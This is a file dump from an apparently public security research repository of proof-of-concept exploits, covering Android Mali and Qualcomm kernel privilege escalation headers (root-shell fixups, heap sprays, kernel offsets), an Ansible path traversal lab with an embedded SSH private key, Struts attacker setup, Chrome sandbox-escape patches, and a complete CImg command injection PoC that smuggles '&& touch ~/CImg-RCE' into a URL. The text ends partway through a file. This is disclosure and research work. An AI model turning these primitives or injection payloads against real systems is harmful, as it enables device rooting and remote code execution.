1 | #ifndef LOG_UTILS_H
2 | #define LOG_UTILS_H
3 |
4 | #ifdef SHELL
5 | #define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6 | #else
7 | #include
8 | #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9 | #endif
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h:
--------------------------------------------------------------------------------
1 | #ifndef MEM_READ_WRITE_H
2 | #define MEM_READ_WRITE_H
3 |
4 | #include "CL/cl.h"
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 |
9 | #define KERNEL_BASE 0x80000000
10 |
11 | #define PAGE_SHIFT 12
12 |
13 | #define OVERWRITE_INDEX 256
14 |
15 | struct rw_mem_kernel {
16 | cl_mem va;
17 | cl_mem in_out;
18 | cl_mem flag;
19 | cl_kernel kernel;
20 | cl_program program;
21 | };
22 |
23 | void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
24 |
25 | void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
26 |
27 | void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
28 |
29 | uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
30 |
31 | void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32);
32 |
33 | void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
34 |
35 | struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64);
36 |
37 | void releaseKernel(struct rw_mem_kernel* kernel);
38 |
39 | int run_enforce();
40 |
41 | #endif
42 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef MEMPOOL_UTILS_H
2 | #define MEMPOOL_UTILS_H
3 |
4 | #include
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 | #include "log_utils.h"
9 |
10 | void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
11 |
12 | void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
13 |
14 | void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
15 |
16 | uint64_t drain_mem_pool(int mali_fd);
17 |
18 | void release_mem_pool(int mali_fd, uint64_t drain);
19 |
20 | #endif
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef LOG_UTILS_H
2 | #define LOG_UTILS_H
3 |
4 | #ifdef SHELL
5 | #define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6 | #else
7 | #include
8 | #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9 | #endif
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h:
--------------------------------------------------------------------------------
1 | #ifndef MEM_WRITE_H
2 | #define MEM_WRITE_H
3 |
4 | #include
5 | #include "mali.h"
6 | #include "mali_base_jm_kernel.h"
7 | #include "midgard.h"
8 | #include "log_utils.h"
9 |
10 | #define KERNEL_BASE 0x80000000
11 |
12 | #define PAGE_SHIFT 12
13 |
14 | #define OVERWRITE_INDEX 256
15 |
16 | void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
17 |
18 | void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
19 |
20 | void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type);
21 |
22 | uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number);
23 |
24 | uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number);
25 |
26 | int run_enforce();
27 | #endif
28 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef MEMPOOL_UTILS_H
2 | #define MEMPOOL_UTILS_H
3 |
4 | #include
5 | #include "mali.h"
6 | #include "mali_base_jm_kernel.h"
7 | #include "log_utils.h"
8 |
9 | void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
10 |
11 | void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
12 |
13 | void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
14 |
15 | uint64_t drain_mem_pool(int mali_fd);
16 |
17 | void release_mem_pool(int mali_fd, uint64_t drain);
18 |
19 | #endif
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef FIRMWARE_OFFSETS_H
2 | #define FIRMWARE_OFFSETS_H
3 |
4 | #define AVC_DENY_2311 0x806b50
5 |
6 | #define SEL_READ_ENFORCE_2311 0x818714
7 |
8 | #define INIT_CRED_2311 0x271bfa8
9 |
10 | #define COMMIT_CREDS_2311 0x167b40
11 |
12 | #define ADD_COMMIT_2311 0x912d0108 //add x8, x8, #0xb40
13 |
14 | #define ADD_INIT_2311 0x913ea000 //add x0, x0, #0xfa8
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef LOG_UTILS_H
2 | #define LOG_UTILS_H
3 |
4 | #ifdef SHELL
5 | #define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6 | #else
7 | #include
8 | #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9 | #endif
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h:
--------------------------------------------------------------------------------
1 | #ifndef MEM_READ_WRITE_H
2 | #define MEM_READ_WRITE_H
3 |
4 | #include "CL/cl.h"
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 |
9 | #define KERNEL_BASE 0x80000000
10 |
11 | #define PAGE_SHIFT 12
12 |
13 | #define OVERWRITE_INDEX 256
14 |
15 | struct rw_mem_kernel {
16 | cl_mem va;
17 | cl_mem in_out;
18 | cl_mem flag;
19 | cl_kernel kernel;
20 | cl_program program;
21 | };
22 |
23 | void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
24 |
25 | void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
26 |
27 | void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
28 |
29 | uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
30 |
31 | void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32);
32 |
33 | void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
34 |
35 | struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64);
36 |
37 | void releaseKernel(struct rw_mem_kernel* kernel);
38 |
39 | int run_enforce();
40 |
41 | #endif
42 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef MEMPOOL_UTILS_H
2 | #define MEMPOOL_UTILS_H
3 |
4 | #include
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 | #include "log_utils.h"
9 |
10 | void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
11 |
12 | void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
13 |
14 | void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
15 |
16 | uint64_t drain_mem_pool(int mali_fd);
17 |
18 | void release_mem_pool(int mali_fd, uint64_t drain);
19 |
20 | #endif
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef ADDR_UTILS
2 | #define ADDR_UTILS
3 |
4 | #define PHYS_TO_VIRT_OFF 0x8080000000ul
5 |
6 | #define VMEMMAP 0xfffffffefde00000ul
7 |
8 | #define KERNEL_PBASE 0xa0080000
9 |
10 | #define KERNEL_VBASE 0xffffffc010080000ul
11 |
12 | //_text - kernel physical base
13 | #define KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE)
14 |
15 | static inline uint64_t page_align(uint64_t x) {
16 | return (x >> 12) << 12;
17 | }
18 |
19 | static inline uint64_t phys_to_virt(uint64_t x) {
20 | return (uint64_t)(x) - PHYS_TO_VIRT_OFF;
21 | }
22 |
23 | static inline uint64_t virt_to_phys_lm(uint64_t x) {
24 | if (x & (1ul << 38)) err(1, "address is not in low mem range.\n");
25 | return x + PHYS_TO_VIRT_OFF;
26 | }
27 |
28 | static inline uint64_t virt_to_phys(uint64_t x) {
29 | if (x & (1ul << 38)) return x - (KERNEL_VBASE - KERNEL_PBASE);
30 | return x + PHYS_TO_VIRT_OFF;
31 | }
32 |
33 | static inline uint64_t phys_to_page(uint64_t phys_addr) {
34 | //VMEMMAP interpreted as page pointer, so pfn needs to multiply by sizeof(struct page)
35 | return (phys_addr >> 12) * 64 + VMEMMAP;
36 | }
37 |
38 | #endif
39 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 | #include "cpu_utils.h"
11 |
12 | #define CPU_SETSIZE 1024
13 | #define __NCPUBITS (8 * sizeof (unsigned long))
14 | typedef struct
15 | {
16 | unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
17 | } cpu_set_t;
18 |
19 | #define CPU_SET(cpu, cpusetp) \
20 | ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
21 | #define CPU_ZERO(cpusetp) \
22 | memset((cpusetp), 0, sizeof(cpu_set_t))
23 |
24 | int migrate_to_cpu(int i)
25 | {
26 | int syscallres;
27 | pid_t pid = gettid();
28 | cpu_set_t cpu;
29 | CPU_ZERO(&cpu);
30 | CPU_SET(i, &cpu);
31 |
32 | syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
33 | if (syscallres)
34 | {
35 | return -1;
36 | }
37 | return 0;
38 | }
39 |
40 | int check_cpu_affinity() {
41 | if (migrate_to_cpu(4) == -1) return 4;
42 | if (migrate_to_cpu(5) == -1) return 5;
43 | return -1;
44 | }
45 |
46 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef CPU_UTILS
2 | #define CPU_UTILS
3 |
4 | int migrate_to_cpu(int i);
5 |
6 | int check_cpu_affinity();
7 | #endif
8 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h:
--------------------------------------------------------------------------------
1 | #ifndef SENDMSG_SPRAY_H
2 | #define SENDMSG_SPRAY_H
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | #define MAX_SENDMSG_BATCH 6
9 |
10 | struct realloc_thread_arg
11 | {
12 | pthread_t tid;
13 | int recv_fd;
14 | int send_fd;
15 | struct sockaddr_un addr;
16 | char* realloc_data;
17 | size_t object_size;
18 | int spray_cpu;
19 | int level;
20 | int type;
21 | int batch_num;
22 | };
23 |
24 | int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs);
25 |
26 | void reset();
27 |
28 | void realloc_NOW(int);
29 |
30 | void cleanup(struct realloc_thread_arg* rta);
31 |
32 | #endif
33 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h:
--------------------------------------------------------------------------------
1 | #ifndef SIGNALFD_SPRAY_H
2 | #define SIGNALFD_SPRAY_H
3 |
4 | #define CPU_RANGE 7
5 |
6 | void spray_signalfd(uint64_t* mask, int num, int cpu, int* fds);
7 |
8 | uint64_t read_signalfd_mask(int fd);
9 |
10 | void spray_with_intervals(uint64_t interval, int count, int exclude_cpu_mask, uint64_t* mask, int* fds, int spray_size);
11 |
12 | int search_changed_mask(uint64_t expected, int* fds, uint64_t fd_size, uint64_t* new_mask);
13 |
14 | void change_signalfd_mask(uint64_t* mask, int fd);
15 | #endif
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef WORK_QUEUE_UTILS
2 | #define WORK_QUEUE_UTILS
3 |
4 | #include "fake_obj_util.h"
5 |
6 | #define SYSTEM_UNBOUND_WQ_OFF 0x2b8f7f8ul
7 |
8 | #define KGSL_DRIVER_OFF 0x2d0a000
9 |
10 | #define KGSL_MEMQUEUE_OFF (KGSL_DRIVER_OFF + 0x518)
11 |
12 | //worker_pool::worklist
13 | #define WORKLIST_OFF 0x20
14 |
15 | uint64_t get_wq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_ptr_addr);
16 |
17 | uint64_t get_pwq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_addr);
18 |
19 | uint64_t map_pwq(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pwq_addr, uint64_t* pwq_region);
20 |
21 | uint64_t map_pwq_pool(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pool_addr, uint64_t* pool_region);
22 |
23 | int queue_work(uint8_t* pool_region, uint64_t pool_addr, uint8_t* pwq_region, uint64_t pwq_addr, uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t worklist_addr);
24 |
25 | void setup_sub_info(uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t kernel_shift, uint64_t arg_vaddr, uint8_t* arg_region);
26 | #endif
27 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h:
--------------------------------------------------------------------------------
1 | #ifndef ADRENO_CMD_H
2 | #define ADRENO_CMD_H
3 |
4 | #include
5 |
6 | #define CP_TYPE4_PKT (4 << 28)
7 | #define CP_TYPE7_PKT (7 << 28)
8 |
9 | #define CP_NOP 0x10
10 | #define CP_WAIT_FOR_ME 0x13
11 | #define CP_WAIT_FOR_IDLE 0x26
12 | #define CP_WAIT_REG_MEM 0x3c
13 | #define CP_MEM_WRITE 0x3d
14 | #define CP_INDIRECT_BUFFER_PFE 0x3f
15 | #define CP_SET_DRAW_STATE 0x43
16 | #define CP_MEM_TO_MEM 0x73
17 | #define CP_SET_PROTECTED_MODE 0x5f
18 |
19 | #define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
20 | #define lower_32_bits(n) ((uint32_t)(n))
21 |
22 | uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr);
23 |
24 | uint pm4_calc_odd_parity_bit(uint val);
25 |
26 | uint cp_type7_packet(uint opcode, uint cnt);
27 |
28 | uint cp_wait_for_me(uint *cmds);
29 |
30 | uint cp_mem_packet(int opcode, uint size, uint num_mem);
31 |
32 | uint cp_wait_for_idle(uint *cmds);
33 |
34 | uint cp_type4_packet(uint opcode, uint cnt);
35 |
36 | uint cp_register(unsigned int reg, unsigned int size);
37 |
38 | uint cp_invalidate_state(uint *cmds);
39 |
40 | #endif
41 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/NPU/sendmsg_spray.h:
--------------------------------------------------------------------------------
1 | #ifndef SENDMSG_SPRAY_H
2 | #define SENDMSG_SPRAY_H
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | struct realloc_thread_arg
9 | {
10 | pthread_t tid;
11 | int recv_fd;
12 | int send_fd;
13 | struct sockaddr_un addr;
14 | char* realloc_data;
15 | size_t object_size;
16 | int cpu;
17 | };
18 |
19 | void migrate_to_cpu(int i);
20 |
21 | int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs);
22 |
23 | void reset();
24 |
25 | void realloc_NOW(void);
26 |
27 | #endif
28 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y \
5 | ansible git curl zip unzip psmisc \
6 | tmux sudo emacs openssh-server net-tools \
7 | gcc
8 |
9 | # Create a user account named "bofh" (which will have sudo privileges).
10 | RUN adduser bofh --disabled-password
11 |
12 | # Grant the 'bofh' user sudo access (only so that we can start sshd).
13 | RUN adduser bofh sudo
14 | RUN echo "bofh:x" | chpasswd
15 | COPY home/ /home/bofh/
16 | RUN chown -R bofh:bofh /home/bofh
17 |
18 | # Switch over to the 'bofh' user, since root access is no longer required
19 | USER bofh
20 | WORKDIR /home/bofh
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/home/.ssh/authorized_keys:
--------------------------------------------------------------------------------
1 | ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMlKzkE3eZi8hNuNzp03Jz95dBu6621V8HstIJJgisT bofh@zeuss
2 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/home/scripts/bashrc:
--------------------------------------------------------------------------------
1 | cd /home/bofh/k/e/v/w/o/z/e/r/e
2 | export HOME=../../../../../../../../../home/bofh
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/server/home/scripts/enable_exploit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | mkdir -p /home/bofh/k/e/v/w/o/z/e/r/e
3 | mkdir -p /home/bofh/home
4 | ln -s /home/bofh/ /home/bofh/home/bofh
5 | cd /home/bofh/scripts
6 | cp /home/bofh/scripts/bashrc /home/bofh/.bashrc
7 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y \
5 | git curl zip unzip psmisc \
6 | tmux sudo emacs openssh-server net-tools x11-apps \
7 | build-essential libssl-dev libffi-dev python-dev \
8 | python-setuptools python-jinja2 python-yaml
9 |
10 | # Create a non-root user account to run Ansible.
11 | RUN adduser bofh --disabled-password
12 |
13 | # Grant the 'bofh' user sudo access, so that we can start sshd.
14 | RUN adduser bofh sudo
15 | RUN echo "bofh:x" | chpasswd
16 | COPY home/ /home/bofh/
17 | RUN chown -R bofh:bofh /home/bofh
18 |
19 | # Switch over to the 'bofh' user, since root access is no longer required
20 | USER bofh
21 | WORKDIR /home/bofh
22 |
23 | # Get vulnerable version of Ansible source code.
24 | RUN git clone https://github.com/ansible/ansible.git && \
25 | cd ansible && \
26 | git checkout f9f7b29a5a5543e8d1c25e8cc1f2d3040d8536b7
27 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/.ssh/id_ed25519:
--------------------------------------------------------------------------------
1 | -----BEGIN OPENSSH PRIVATE KEY-----
2 | b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
3 | QyNTUxOQAAACDjJSs5BN3mYvITbjc6dNyc/eXQbuuttVfB7LSCSYIrEwAAAJDuQrmQ7kK5
4 | kAAAAAtzc2gtZWQyNTUxOQAAACDjJSs5BN3mYvITbjc6dNyc/eXQbuuttVfB7LSCSYIrEw
5 | AAAEATobJL9MLSQNtHem7bzn8zp7dLWqdqP5VQo3Ma61L9+eMlKzkE3eZi8hNuNzp03Jz9
6 | 5dBu6621V8HstIJJgisTAAAACmJvZmhAemV1c3MBAgM=
7 | -----END OPENSSH PRIVATE KEY-----
8 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/.ssh/id_ed25519.pub:
--------------------------------------------------------------------------------
1 | ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMlKzkE3eZi8hNuNzp03Jz95dBu6621V8HstIJJgisT bofh@zeuss
2 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/config/ansible.cfg:
--------------------------------------------------------------------------------
1 | [defaults]
2 | inventory = inventory.d
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/config/inventory.d/inventory:
--------------------------------------------------------------------------------
1 | [servers]
2 | 172.16.0.10
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Ansible/fetch_CVE-2019-3828/zeuss/home/config/myfetch.yml:
--------------------------------------------------------------------------------
1 | ---
2 | - hosts: servers
3 | tasks:
4 | - name: Fetch authorized_keys
5 | fetch:
6 | src: ~/.ssh/authorized_keys
7 | dest: fetched
8 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-attacker/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y curl tmux emacs net-tools gcc ssh build-essential
5 |
6 | # Create user account for the attacker.
7 | RUN adduser attacker --disabled-password
8 |
9 | # Copy the exploit PoC into the attacker's home directory.
10 | COPY src /home/attacker/src
11 | RUN chown -R attacker:attacker /home/attacker/src
12 |
13 | # Switch over to the 'attacker' user, since root access is no longer required
14 | USER attacker
15 | WORKDIR /home/attacker
16 | RUN cd src && make
17 |
18 | # Create an ssh key for the attacker.
19 | RUN ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -q -P ""
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-attacker/src/Makefile:
--------------------------------------------------------------------------------
1 | all: copykey startcalc
2 |
3 | clean:
4 | rm -f *.o copykey startcalc
5 |
6 | copykey: copykey.o utils.o
7 | gcc -Wall copykey.o utils.o -o copykey
8 |
9 | startcalc: startcalc.o utils.o
10 | gcc -Wall startcalc.o utils.o -o startcalc
11 |
12 | copykey.o: copykey.c utils.h
13 | gcc -c copykey.c
14 |
15 | startcalc.o: startcalc.c utils.h
16 | gcc -c startcalc.c
17 |
18 | utils.o: utils.c utils.h
19 | gcc -c utils.c
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-attacker/src/utils.h:
--------------------------------------------------------------------------------
1 | int escape_forward_slash(char* dst, size_t dstlen, const char* src);
2 | int urlencode(char* dst, size_t dstlen, const char* src);
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Apache/Struts/CVE-2018-11776/struts-server/struts-actionchaining.xml:
--------------------------------------------------------------------------------
1 |
2 |
22 |
25 |
26 |
27 |
28 |
29 | register2
30 |
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/SecurityExploits/CImg/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y git gcc build-essential curl
5 |
6 | # Create user account for the attacker.
7 | RUN adduser semmle --disabled-password
8 |
9 | # Copy the exploit PoC into the user's home directory.
10 | COPY poc.c /home/semmle/poc.c
11 | RUN chown -R semmle:semmle /home/semmle/
12 |
13 | # Switch over to the 'semmle' user, since root access is no longer required
14 | USER semmle
15 | WORKDIR /home/semmle
16 | RUN git clone https://framagit.org/dtschump/CImg.git
17 | RUN cd CImg && git checkout 5bb8a03d7fed06275ddb53a56c567fb6f61aa4a4
18 |
--------------------------------------------------------------------------------
/SecurityExploits/CImg/README.md:
--------------------------------------------------------------------------------
1 | # Command injection in CImg
2 |
3 | This is a proof of concept for a command injection vulnerability in the [CImg](http://cimg.eu/) library. The vulnerability was found by [Cristian-Alexandru Staicu](https://www.linkedin.com/in/crstaicu/), during his internship at Semmle in 2018. We reported the vulnerability to David Tschumperle, maintainer of CImg, on Jul 27, 2018. The vulnerability was [fixed](https://github.com/dtschump/CImg/commit/5ce7a426b77f814973e56182a0e76a2b04904146) in version 2.3.4.
4 |
5 | The problem is that the `load_network` function does not do any sanitization on the url string. Internally, `load_network` calls `system`, which means that a specially crafted url can trigger code execution. Since CImg is a library, the severity of the issue depends greatly on how it is used. If anyone has written an application that calls `load_network` directly with a string that came from something like a HTTP request, then it would be a remote code execution vulnerability.
6 |
7 | To run the PoC, first build and run the docker image:
8 |
9 | ```bash
10 | docker build . -t cimg
11 | docker run -i -t cimg
12 | ```
13 |
14 | The Dockerfile clones the [CImg](https://framagit.org/dtschump/CImg.git) git repository and checks out the vulnerable version.
15 |
16 | Now, inside docker, compile and run the PoC as follows:
17 |
18 | ```bash
19 | g++ -I./CImg poc.c -o poc
20 | ./poc
21 | ```
22 |
23 | Notice that the file `~/CImg-RCE` has now been created.
24 |
--------------------------------------------------------------------------------
/SecurityExploits/CImg/poc.c:
--------------------------------------------------------------------------------
1 | #undef cimg_display
2 | #define cimg_display 0
3 | #include "CImg.h"
4 | using namespace cimg_library;
5 |
6 | // To compile and run:
7 | //
8 | // g++ -I./CImg poc.c -o poc
9 | // ./poc
10 | //
11 | // Notice that the file ~/CImg-RCE has now been created.
12 |
13 | int main(int argc, char **argv) {
14 | const char *str = "https://i.pinimg.com/originals/da/25/51/da2551d47b8ae00fa7beb583bff53236.jpg\" && touch ~/CImg-RCE && echo \"";
15 | CImg<> img;
16 | img.assign(str);
17 |
18 | return 0;
19 | }
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/aarch64/browser.patch:
--------------------------------------------------------------------------------
1 | diff --git a/components/autofill/core/browser/autofill_manager.cc b/components/autofill/core/browser/autofill_manager.cc
2 | index 07b62e25c1ff..d5496277f632 100644
3 | --- a/components/autofill/core/browser/autofill_manager.cc
4 | +++ b/components/autofill/core/browser/autofill_manager.cc
5 | @@ -2542,7 +2542,9 @@ void AutofillManager::GetAvailableSuggestions(
6 | return;
7 | }
8 |
9 | - context->is_context_secure = !IsFormNonSecure(form);
10 | +// context->is_context_secure = !IsFormNonSecure(form);
11 | + context->is_context_secure = true;
12 | +
13 |
14 | // TODO(rogerm): Early exit here on !driver()->RendererIsAvailable()?
15 | // We skip populating autofill data, but might generate warnings and or
16 | diff --git a/components/autofill/core/browser/payments/credit_card_access_manager.cc b/components/autofill/core/browser/payments/credit_card_access_manager.cc
17 | index 560f30b57c88..6b5715949ffd 100644
18 | --- a/components/autofill/core/browser/payments/credit_card_access_manager.cc
19 | +++ b/components/autofill/core/browser/payments/credit_card_access_manager.cc
20 | @@ -163,7 +163,7 @@ void CreditCardAccessManager::PrepareToFetchCreditCard() {
21 | #if !defined(OS_IOS)
22 | // No need to fetch details if there are no server cards.
23 | if (!ServerCardsAvailable())
24 | - return;
25 | +// return;
26 |
27 | // Do not make an unnecessary preflight call unless signaled.
28 | if (!can_fetch_unmask_details_.IsSignaled())
29 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/aarch64/trigger.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/arm/browser.patch:
--------------------------------------------------------------------------------
1 | diff --git a/components/autofill/core/browser/autofill_manager.cc b/components/autofill/core/browser/autofill_manager.cc
2 | index 07b62e25c1ff..d5496277f632 100644
3 | --- a/components/autofill/core/browser/autofill_manager.cc
4 | +++ b/components/autofill/core/browser/autofill_manager.cc
5 | @@ -2542,7 +2542,9 @@ void AutofillManager::GetAvailableSuggestions(
6 | return;
7 | }
8 |
9 | - context->is_context_secure = !IsFormNonSecure(form);
10 | +// context->is_context_secure = !IsFormNonSecure(form);
11 | + context->is_context_secure = true;
12 | +
13 |
14 | // TODO(rogerm): Early exit here on !driver()->RendererIsAvailable()?
15 | // We skip populating autofill data, but might generate warnings and or
16 | diff --git a/components/autofill/core/browser/payments/credit_card_access_manager.cc b/components/autofill/core/browser/payments/credit_card_access_manager.cc
17 | index 560f30b57c88..6b5715949ffd 100644
18 | --- a/components/autofill/core/browser/payments/credit_card_access_manager.cc
19 | +++ b/components/autofill/core/browser/payments/credit_card_access_manager.cc
20 | @@ -163,7 +163,7 @@ void CreditCardAccessManager::PrepareToFetchCreditCard() {
21 | #if !defined(OS_IOS)
22 | // No need to fetch details if there are no server cards.
